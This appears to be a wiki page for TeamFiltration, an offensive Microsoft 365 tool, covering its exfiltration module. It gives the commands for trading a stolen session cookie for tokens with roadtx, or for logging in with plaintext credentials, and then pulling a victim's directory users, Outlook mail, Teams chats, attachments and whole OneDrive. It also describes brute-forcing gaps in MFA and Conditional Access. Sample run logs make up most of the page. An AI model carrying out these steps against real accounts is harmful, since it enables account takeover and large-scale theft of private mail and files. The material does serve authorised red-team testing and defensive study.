-
Notifications
You must be signed in to change notification settings - Fork 125
Exfiltration
If you want to authenticate to your target O365 account using Cookies, you must first exchange the cookies for some tokens using the RoadTools python toolkit by @_dirkjan first.
Identify the ESTSAUTHPERSISTENT cookies and give it to RoadTX like shown below. This will authenticate using our cookies and retrieve a fresh set of JWT tokens. The produced tokens will be saved in the .roadtools_auth file by default.
roadtx interactiveauth --estscookie "0.AXoAqzBRR7ViQU.................<snip>"
Then feed that .roadtools_auth file into TeamFiltration like this
[♥] TeamFiltration V3.5.1 PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --config C:\config.txt --outpath C:\TeamFiltration --exfil --all --roadtools .roadtools_auth
[!] The exfiltration modules does not use FireProx, ORIGIN IP WILL BE LOGGED, are you an adult? (Y/N)
[+] Exfiltrating data from user [email protected]
[EXFIL] 01.03.2023 14:10:38 EST Exfiltrating AAD users and groups via MS AD Graph API
[EXFIL] 01.03.2023 14:10:44 EST Exfiltrating AAD users and groups via MS graph API
[EXFIL] 01.03.2023 14:10:45 EST Got 1337 AAD users, appending to database as valid users!
[EXFIL] 01.03.2023 14:10:49 EST Exfiltrating emails from Outlook!
[EXFIL] 01.03.2023 14:10:50 EST Fetched 1337 email ID's , exfiltrating content!
[EXFIL] 01.03.2023 14:10:54 EST Exfiltrating recently used contacts
[EXFIL] 01.03.2023 14:10:55 EST Exfiltrating all sent attachments from chat logs
[EXFIL] 01.03.2023 14:10:57 EST Exfiltrating all chat logs/conversations
[EXFIL] 01.03.2023 14:10:57 EST Exfiltrating shared files from OneDrive
[EXFIL] 01.03.2023 14:10:58 EST Exfiltrating the entire personal OneDrive
[EXFIL] 01.03.2023 14:11:00 EST |--> Desktop (Folder)
[EXFIL] 01.03.2023 14:11:00 EST |--> Documents (Folder)
[EXFIL] 01.03.2023 14:11:00 EST |--> Pictures (Folder)
[EXFIL] 01.03.2023 14:11:01 EST |--> Microsoft Teams.lnk
[EXFIL] 01.03.2023 14:11:08 EST Exfiltrating 0 recent files accessible by user
If you have credentials and simply want to use the Exfiltration portion of TeamFiltration, they can be supplied directly. Note that if the login attempted is blocked by MFA / Conditional access, TeamFiltration will attempt to identify a gap in the policies(s) by brute-forcing a series of login combinations with unique combinations on Resources URI, ClientId, and Device.
[♥] TeamFiltration VX.X.X PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --config C:\config.txt --outpath C:\TeamFiltration --exfil --all --username [email protected] --password Passw0rd123!
[!] The exfiltration modules does not use FireProx, ORIGIN IP WILL BE LOGGED, are you an adult? (Y/N)
[SPRAY] 01.03.2023 14:02:11 EST Sprayed [email protected]:Passw0rd123! => VALID NO MFA!
[SPRAY] 01.03.2023 14:02:19 EST Refreshed a token for => https://graph.microsoft.com
[SPRAY] 01.03.2023 14:02:29 EST Refreshed a token for => https://api.spaces.skype.com
[EXFIL] 01.03.2023 14:02:37 EST Cross-resource-refresh allowed, we can exfil all that things!
[SPRAY] 01.03.2023 14:02:40 EST Refreshed a token for => https://graph.windows.net
[SPRAY] 01.03.2023 14:02:46 EST Found valid access token in database for => https://graph.microsoft.com
[EXFIL] 01.03.2023 14:02:46 EST Exfiltrating AAD users and groups via MS graph API
[EXFIL] 01.03.2023 14:02:47 EST Got 1337 AAD users, appending to database as valid users!
[EXFIL] 01.03.2023 14:02:50 EST Exfiltrating AAD users and groups via MS AD Graph API
[SPRAY] 01.03.2023 14:04:05 EST Refreshed a token for => https://outlook.office365.com
[EXFIL] 01.03.2023 14:04:07 EST Exfiltrating emails from Outlook!
[EXFIL] 01.03.2023 14:04:08 EST Fetched 1337 email ID's , exfiltrating content!
[SPRAY] 01.03.2023 14:04:13 EST Found valid access token in database for => https://api.spaces.skype.com
[SPRAY] 01.03.2023 14:04:14 EST Refreshed a token for => https://example-my.sharepoint.com
[EXFIL] 01.03.2023 14:04:14 EST Exfiltrating recently used contacts
[EXFIL] 01.03.2023 14:04:16 EST Exfiltrating all sent attachments from chat logs
[EXFIL] 01.03.2023 14:04:17 EST Exfiltrating all chat logs/conversations
[SPRAY] 01.03.2023 14:04:26 EST Refreshed a token for => https://example.sharepoint.com
[SPRAY] 01.03.2023 14:04:26 EST Found valid access token in database for => https://example.sharepoint.com
[SPRAY] 01.03.2023 14:04:26 EST Found valid access token in database for => https://outlook.office365.com
[SPRAY] 01.03.2023 14:04:27 EST Refreshed a token for => https://management.core.windows.net
[SPRAY] 01.03.2023 14:04:27 EST Found valid access token in database for => https://graph.microsoft.com
[SPRAY] 01.03.2023 14:04:27 EST Found valid access token in database for => https://graph.windows.net
[EXFIL] 01.03.2023 14:04:32 EST Exfiltrating shared files from OneDrive
[EXFIL] 01.03.2023 14:04:34 EST Exfiltrating the entire personal OneDrive
[EXFIL] 01.03.2023 14:04:36 EST |--> Desktop (Folder)
[EXFIL] 01.03.2023 14:04:36 EST |--> Documents (Folder)
[EXFIL] 01.03.2023 14:04:36 EST |--> Pictures (Folder)
[EXFIL] 01.03.2023 14:04:37 EST |--> Microsoft Teams.lnk
[EXFIL] 01.03.2023 14:04:40 EST Exfiltrating 0 recent files accessible by user
If you have access to an exfiltrated Teams database, it can also be provided to TeamFiltration and used for authentication
Example
You can also authenticate to your targets O365 account using a single JWT access token, a series of JWT access token seperated by , , or a path to a file containing newline seperated access tokens.
Example